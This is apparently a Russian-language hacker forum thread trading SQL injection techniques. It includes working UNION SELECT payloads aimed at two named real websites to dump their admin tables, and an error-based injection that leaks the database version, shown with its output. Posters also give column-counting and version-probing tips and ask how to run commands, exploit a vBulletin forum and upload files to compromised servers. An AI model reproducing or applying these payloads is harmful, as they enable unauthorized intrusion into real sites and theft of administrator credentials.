Darren! Code: _http://www.zckc.com.tw/products-cont.php?Key=-11+union+select+2,3,4,5,6,admin.*,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+admin--+ Code: _http://www.zckc.com.tw/products-cont.php?Key=-11+union+select+2,3,4,5,6,7,admin.*,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+admin--+ Ы_Ы
Почему может быть так: xxxx.com/order.php?id=49%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20--&lid=2&mnID=12&pageNum_getCategoryProducts=1 при 24 пишет что неправильное кол-во столбцов а при 25 You have an error in your SQL syntax; check the manual that corresponds for the right syntax to use near 'union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 -' at line 9 т.е. столбцов 25,но страницу же мне не выводит для вывода пробую писать без хвоста, т.е. просто xxxx.com/order.php?id=49%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20-- тогда вообще выводит обычную страницу даже при постановке id=49' Как быть?
Вопрос №5 Подбираю столбцы ордером пишет(допустим) 2, делаю запрос union+select+1,2 ничего не выводит (выводит ошибку) Первое что нужно сделать в этом случае. проверить версию базы, например так: site.com/index.php?id=1+and+substring(version(),1,1)=3 site.com/index.php?id=1+and+substring(version(),1,1)=4 site.com/index.php?id=1+and+substring(version(),1,1)=5 Если оказалось, что версия третья, то неудивительно. что вывода нет, оператор union введён с четвётой версии mysql. B этом случае читаем статьи по проведению инъекций в 3 ветке Если версия >=4 . или мы видим ошибку different number of columns это вовсе не означает, что вывода не будет. Вероятность найти вывод всё равно остаётся. По этой теме идём читать сюда: different number of columns с поста 79 и вниз со всеми комментариями
Code: http://www.cggeorgallis.com/products.php?cid=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+products+group+by+2+limit+1)a)--+&lid=2&mnID=12&pageNum_getCategoryProducts=1 4.1.22-standard-log
Как через sql инъекцию выполнить команду, и просмотреть phpinfo ? Допустим при таком запросе: http://site.ru/index.php?id=-1+union+select+1,2,3-- принтабельный столбец 2.
Code: http://site.ru/index.php?id=-1+union+select+1,column_name,3+from+information_schema.columns+where+table_name='phpinfo'+--+ Если я правильно понял .
Есть права модера и vbulletin 4.0.2 , пробовал все способы со старых версий- не работают. Жду предложений.
WTF ???? Убедительная просьба, если не понимаешь о чём речь, не нужно советов. Судя по твоим постам, просто - не нужно советов! a1ertso Никак в мускуле не выполнить комманду. Продвинутые базы позволяют выполнять, но не php код, а системные комманды, как зависит от оси и базы, но в 99% случаев это сделать не удастся из-за прав.
хм...как можно на сервер загрузить файл, если при использовании wget и curl пишется premission denied, на на get и fetch - command not found ? есть еще способы ?
